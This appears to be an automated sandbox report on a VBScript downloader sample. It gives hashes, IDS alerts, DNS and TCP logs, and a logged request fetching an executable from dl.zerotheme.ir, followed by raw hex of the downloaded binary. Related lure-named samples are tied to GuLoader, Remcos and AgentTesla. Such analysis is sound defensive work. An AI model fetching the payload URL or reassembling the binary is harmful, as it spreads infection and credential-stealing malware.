	hAs0X5MYKz.elf	Get hash	malicious	Mirai	Browse	45.140.242.239

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	NTS_eTaxInvoice.html.vbs	Get hash	malicious	Remcos, GuLoader	Browse	185.18.213.20
	RFQ-5120240930 VENETA PESCA SRL.vbs	Get hash	malicious	VIP Keylogger	Browse	185.18.213.20
	Faktura_82666410_1361590461#U00b7pdf.vbe	Get hash	malicious	Remcos, GuLoader	Browse	185.18.213.20
	11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs	Get hash	malicious	GuLoader	Browse	185.18.213.20
	Urgent Quotation Notification_pdf.vbs	Get hash	malicious	Unknown	Browse	185.18.213.20
	http://hrlaw.com.au	Get hash	malicious	Unknown	Browse	185.18.213.20
	file.exe	Get hash	malicious	Unknown	Browse	185.18.213.20
	file.exe	Get hash	malicious	Unknown	Browse	185.18.213.20
	CAPE MARS VSL'S PARTICULARS.docx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.18.213.20
	MV TASOS Vessel's Details.docx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.18.213.20

Process:	C:\Users\user\AppData\Local\Temp\temp_exec.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\temp_exec.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	86344
Entropy (8bit):	7.227831135775574
Encrypted:	false
SSDEEP:	1536:lJ5V7RmVQHVZII4JfAxa6UB+UjQSfYmkT0LHxWvW7Hxi+77wjxr:b7RgQ1hcIxa6Au4LmWQ+7c9
MD5:	055742AC290225D245F94E168DC06A76
SHA1:	1AD224B77A97F558A731FDF1D4D4E7E6B1CF194E
SHA-256:	362234001FBBA9BBC1CC503B547C42D8FD1B1C713AB815D945743E79D8DF8730
SHA-512:	C8A0BE7E44C2438B0170983C387F8397C8E47F76F76DA9A6B3C32C005D7C490BCC21891D80AA7FC172D6D5915BC3DAFD615B31BFE52CFD4049F06118D2714E43
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 21%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..f..............0.............z.... ........@.. .......................`............`................................. ...W.......0k..............HQ...........K............................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...0k.......l..................@..@................\.......H.......`L...b...........B..X...........................................".(.........0...........(2.........0..[........~....~........,@.E.........-......&..(....%&(....%&(7...%&(....%&(....%&........~.....+....0...........~.....+....0..................0...........(U.....0...........(V.....0..........s....(....%&t...........0...........~.....+....0..M.......(\...%&.......sW...(....(\...%&.......sW...(....(?.....(....%&..(....%&.........0...........(2...*..0..........

Static File Info

General

File type:	ASCII text, with very long lines (65478), with CRLF line terminators
Entropy (8bit):	5.261910246720604
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	QT2Q1292300924.vbs
File size:	296'072 bytes
MD5:	89aa513b7cfd714c24c50f05eb9481e5
SHA1:	41423bffc04045cb290ee12b2fd6c9b1b04f0b17
SHA256:	4bb4cdefee252662fa8e54be243b7fe819bccc08d69c206bcf8633588615090f
SHA512:	5842e803e5676c485ad94a60af21582e5ad6560435c7f3228d37b2eaf95dc1c018f5f455866a109fdc7464cbc5e5689b72d3c6810f719fb162e307a5e3d847ad
SSDEEP:	3072:4sVbOQv0kbT6co98cqJ0wT/EITtrIe93l7sVbOQv0kbT6co98cqJ0wT/EITtrIeB:OQ8kQqJjtTtv3VQ8kQqJjtTtv3j
TLSH:	15547C72CF0579494783377C8B49275BFC4C49B8E3A6DEE4E6AB942041E9B313167AC8
File Content Preview:	' Main script logic for processing Base64-encoded data....' Define the Base64-encoded string (use actual data in place of "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T10:03:30.081361+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49705	185.18.213.20	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 10:03:26.745471001 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:26.745516062 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:26.745609045 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:26.750905037 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:26.750916958 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:27.573914051 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:27.574110031 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:27.578809023 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:27.578820944 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:27.579113007 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:27.620027065 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:27.651563883 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:27.699414015 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.038217068 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.088648081 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.208810091 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.208841085 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.208858967 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.208901882 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.208914042 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.208935976 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.208962917 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.208966017 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.208985090 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.208991051 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.209036112 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.222935915 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.222980976 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.223023891 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.223037004 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.223067045 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.223086119 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.378715038 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.378768921 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.379848957 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.379848957 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.379873037 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.379925013 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.380297899 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.380311966 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.380367041 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.380373955 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.380423069 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.382999897 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.383016109 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.383120060 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.383126020 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.383176088 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.467150927 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.467169046 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.467297077 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.467314005 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.467365980 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.550026894 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.550045967 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.550303936 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.550318956 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.550364971 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.551470995 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.551487923 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.551580906 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.551587105 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.551635027 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.552289963 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.552304983 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.552382946 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.552388906 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.552433014 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.554066896 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.554083109 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.554187059 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.554202080 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.554251909 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.555649042 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.555664062 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.555738926 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.555743933 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.555793047 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.556662083 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.556675911 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.556740046 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.556745052 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.556776047 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.556797028 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.638854027 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.638874054 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.639053106 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.639077902 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.639173031 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.720452070 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.720470905 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.720583916 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.720593929 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.720643044 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.721354961 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.721369982 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.721437931 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.721443892 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.721491098 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.723593950 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.723608971 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.723669052 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.723670006 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.723680019 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.723720074 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.723969936 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.724014044 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.724035978 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.724040985 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.724072933 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.724100113 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.724251986 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.724313021 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.724314928 CEST	443	49704	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.724380016 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.768003941 CEST	49704	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.790750980 CEST	49705	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.790838957 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:28.790935040 CEST	49705	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.799592018 CEST	49705	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:28.799631119 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:29.603852987 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:29.606240034 CEST	49705	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:29.606256008 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.081377983 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.135616064 CEST	49705	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:30.135669947 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.182466984 CEST	49705	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:30.254021883 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.254059076 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.254101992 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.254121065 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.254151106 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.254160881 CEST	49705	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:30.254216909 CEST	49705	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:30.254385948 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.254499912 CEST	443	49705	185.18.213.20	192.168.2.5
Sep 30, 2024 10:03:30.254559994 CEST	49705	443	192.168.2.5	185.18.213.20
Sep 30, 2024 10:03:30.254868031 CEST	49705	443	192.168.2.5	185.18.213.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 10:03:26.387151003 CEST	56443	53	192.168.2.5	1.1.1.1
Sep 30, 2024 10:03:26.739684105 CEST	53	56443	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 10:03:26.387151003 CEST	192.168.2.5	1.1.1.1	0x625e	Standard query (0)	dl.zerotheme.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 10:03:26.739684105 CEST	1.1.1.1	192.168.2.5	0x625e	No error (0)	dl.zerotheme.ir		185.18.213.20	A (IP address)	IN (0x0001)	false
Sep 30, 2024 10:03:40.603621960 CEST	1.1.1.1	192.168.2.5	0x9f26	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Sep 30, 2024 10:03:40.603621960 CEST	1.1.1.1	192.168.2.5	0x9f26	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Sep 30, 2024 10:03:41.097291946 CEST	1.1.1.1	192.168.2.5	0x6a08	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 30, 2024 10:03:41.097291946 CEST	1.1.1.1	192.168.2.5	0x6a08	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dl.zerotheme.ir

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.18.213.20	443	3840	C:\Users\user\AppData\Local\Temp\temp_exec.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 08:03:27 UTC	90	OUT	GET /kokorila/cgl-bin/bina.exe HTTP/1.1 Host: dl.zerotheme.ir Connection: Keep-Alive
2024-09-30 08:03:28 UTC	207	IN	HTTP/1.1 200 OK Connection: close content-type: application/x-msdownload last-modified: Mon, 30 Sep 2024 07:44:02 GMT accept-ranges: bytes content-length: 286208 date: Mon, 30 Sep 2024 08:03:27 GMT
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 17 50 af 59 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 4c 04 00 00 00 00 00 00 00 00 00 30 15 00 00 00 10 00 00 00 60 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 Data Ascii: MZERX<(!L!This program cannot be run in DOS mode.$y=`g=`g=`g:`g<`g<`gRich=`gPELPYL0`@
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: 82 7a 3b 10 9f 97 53 0a 6b 45 5d b1 04 06 3b ca 23 c4 b1 63 4d 37 18 b7 40 c9 ce 82 ca 0a 99 92 9b c1 92 48 ab ad f2 93 e9 c1 7e 2f 98 4e 21 49 40 ae f9 49 7d da ac 13 4e a0 ab f4 10 30 64 ce 0f 4b 9d 1b ed 00 36 7a 08 95 5d 00 aa 28 35 e4 5a 42 a4 f5 83 c4 1b d1 5c 8e df f6 05 30 b6 c6 8b 75 d6 88 07 9f 53 9f 9b bd 1c 05 21 c6 5a ee a8 9b b4 45 e6 cd de bf 78 08 00 fe 99 16 8b d1 0e 35 e4 d7 91 41 e4 ef f7 1b df 30 ae dd 35 d0 21 8c f6 0b 4b ff dd 1d 99 ad 13 0e 8b 2c a9 d0 56 6e d4 bd 32 6f 26 0c 79 d3 f8 ec 7e 79 db b6 6a a8 92 c9 8a 59 e4 ab ac 25 eb db 55 a6 49 15 24 35 62 59 74 64 87 4b c5 d8 fe 31 fd 50 39 e8 e0 44 60 7d 8a 7b de 5f a9 e6 8c ca 7c f2 55 5b 78 12 88 aa 06 f6 06 3b 7a a2 79 d7 9a 59 8c 6b a8 80 e3 da 4e 31 0c 17 b3 de f7 00 42 b8 60 Data Ascii: z;SkE];#cM7@H~/N!I@I}N0dK6z](5ZB\0uS!ZEx5A05!K,Vn2o&y~yjY%UI$5bYtdK1P9D`}{_\|U[x;zyYkN1B`
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: 47 b6 02 c6 fa 61 87 56 c2 2f a8 ac 65 92 ec ee a2 7e 1f 14 1f 31 5c 71 2b 86 50 26 84 e8 95 97 c4 ca 76 b2 9e 9b 63 33 59 12 62 dc 6f 3a 71 54 a4 ca e3 a0 a1 51 a0 19 4f 13 ca f5 f7 b1 ea 9a 6f db f0 fa dc 2b 3c de f5 ee 0c 6c 3a 80 41 2b 4e 65 96 2c be 59 a2 9b a5 20 3e 43 d9 84 a9 1f c0 c4 80 fa 6e 50 d0 0e 9e 34 ab c8 1c f8 80 21 33 48 f9 0d 1a 41 91 4b 8a 7f 47 be c1 71 6b 4b e7 7c 8a 2d b2 2e 00 e2 e2 3d e1 8e ce 2f 83 b0 9f 1b ea c3 45 2b 10 7c 23 34 41 eb e5 a6 22 d2 8a 0b 43 6f a5 0a e3 43 79 fe 30 4f cd 65 e1 e2 29 b7 e6 24 29 90 37 65 50 d1 59 61 b9 75 d2 91 6a 62 1f 69 0a 89 76 93 e7 f5 a5 a7 8e 46 d8 15 fa 02 1c 9a 22 45 d0 d6 36 69 b6 cf 44 ce ac 9a 9b c3 cf 2a 3b 39 7b 5c bc 7c 0a f3 bc d2 7b dd 9b 61 90 0b 5f 92 d5 f5 8a 6f db 31 d4 b7 b2 Data Ascii: GaV/e~1\q+P&vc3Ybo:qTQOo+<l:A+Ne,Y >CnP4!3HAKGqkK\|-.=/E+\|#4A"CoCy0Oe)$)7ePYaujbivF"E6iD*;9{\\|{a_o1
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: e6 61 cb a4 4a a8 0d 00 41 fb 98 4e 3f 72 48 c8 e7 1e 6e d5 9a 84 72 b5 21 7f 3b 24 22 1c 8f a6 58 39 8d 57 5e ee 2f d3 5e d7 2a b5 a8 ef 63 1c e4 05 f6 de bc d8 d1 ec c6 4c 87 14 28 ba a2 7b 4c d7 fe ed dd d2 3c 2c 67 ab 57 54 63 a9 be 27 c7 d5 45 65 47 c6 80 52 0d 1d 8b c8 78 d4 12 7d 86 24 0f b0 8e f9 aa a3 90 ae 58 15 f2 8c 9a 9a 99 70 5e 4f 9b 93 ce 4e 49 6c be f9 97 6d 67 43 04 62 54 30 0c 44 b2 9f 32 33 29 45 05 30 36 c6 ee 40 a4 a2 5a 9b f9 12 d5 ef 03 87 30 e9 ef 9f 3a be 52 85 d1 74 bf 8c 32 ee 32 74 30 0a ac df fa 2c 36 e3 14 81 6b 63 19 e0 79 d0 cd ec bd 53 88 79 62 7b 77 b3 12 50 ff 03 8f a6 8e 70 5f 86 e8 3b f2 13 3d b5 96 d1 73 38 00 94 10 87 1a 57 d0 1f be 89 9f d7 ba c8 c5 05 31 80 f6 d9 bd e8 df 28 4f de 47 74 d8 17 21 b3 03 19 d3 ff 83 Data Ascii: aJAN?rHnr!;$"X9W^/^*cL({L<,gWTc'EeGRx}$Xp^ONIlmgCbT0D23)E06@Z0:Rt22t0,6kcySyb{wPp_;=s8W1(OGt!
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: d8 dc c6 74 2f 65 f5 5f e9 a8 e7 37 7a e9 35 99 4d 27 c3 e8 50 88 99 fc f7 7d 12 f8 04 c1 3c 42 f4 d9 5c 86 3c 3f 80 f1 13 2f 9f 35 28 62 38 50 5a 66 1b f3 57 07 ae 56 83 6f 10 6b 01 85 d2 03 b8 a0 3c 40 d9 9d 89 23 a4 b3 17 77 97 b8 53 cf 09 fb 87 5f 30 0b c8 e7 ec 5a f8 cd 95 59 95 0f ea 24 94 23 33 e0 f5 80 f2 5a ca fe ba c9 50 35 b8 51 da c0 fa 73 3d 5b ff 08 1c 90 4d b1 83 66 66 23 82 eb a6 28 ef f6 46 fd 73 10 61 e8 56 3b f2 7b 07 39 5f 49 c6 67 6c 4e 63 87 c6 60 c2 66 76 13 34 17 33 bf d0 5c bf 1b 3e 83 b3 82 a1 67 29 c7 c3 5d 0c a7 c1 46 06 1c 81 c8 47 b3 74 1b ab aa 67 c4 83 a7 6b eb ee 4d 02 b8 b1 f3 e5 ad 91 d5 3a a0 e8 70 50 8e c6 f6 37 7d 24 d4 ad 78 52 05 b9 d1 df 5d 3f da 42 f8 cd 48 8f 5b 42 0b 2a 28 d4 c2 77 1e 28 83 c6 18 0f 05 fc 8e 0f Data Ascii: t/e_7z5M'P}<B\<?/5(b8PZfWVok<@#wS_0ZY$#3ZP5Qs=[Mff#(FsaV;{9_IglNc`fv43\>g)]FGtgkM:pP7}$xR]?BH[B*(w(
2024-09-30 08:03:28 UTC	16384	IN	Data Raw: db 39 51 fa d2 db 4c e8 df 54 17 f3 63 16 b9 cb 11 45 56 6e 39 69 1e f4 9a 6c 24 fc 72 20 5e 34 7f 3d ff d8 5f e9 94 a3 fa 64 af 9f 42 25 35 13 3d 43 78 fb 51 ab 76 d3 62 82 dd e1 3c d8 c4 21 59 f1 d0 2a f6 c7 26 ef 61 cf c3 63 89 7b 53 d6 48 48 4d 67 62 41 85 9f e1 34 a2 50 fd e3 58 4e 4b 36 3d d7 b5 ff bc 32 b2 01 5a a9 93 1a cf 54 b3 be 40 d8 b2 e8 b2 a1 6a 37 a5 1a d6 6a ac 2f d9 e1 64 a0 41 21 94 c6 cc d4 6b 49 7e 68 3d 0e 57 48 69 75 e3 22 ee 16 f0 8a 96 87 e4 92 9d 1f 5e 74 b3 b2 4c 26 e7 cd c7 c1 c6 17 af 2b f2 78 8b 45 1e 28 b2 83 6d 5a c6 f1 b9 17 24 48 59 17 3b b3 f3 58 62 a7 dc 47 a2 33 39 aa 94 e8 c0 8e e2 a4 a2 30 f8 92 c5 51 98 a7 b3 de 96 5f f6 b2 38 75 e6 df 32 b1 9d a8 19 1a 59 a4 3d ef 20 ea 44 09 dc e4 17 6c 30 8d 91 c1 aa 91 d9 38 38 Data Ascii: 9QLTcEVn9il$r 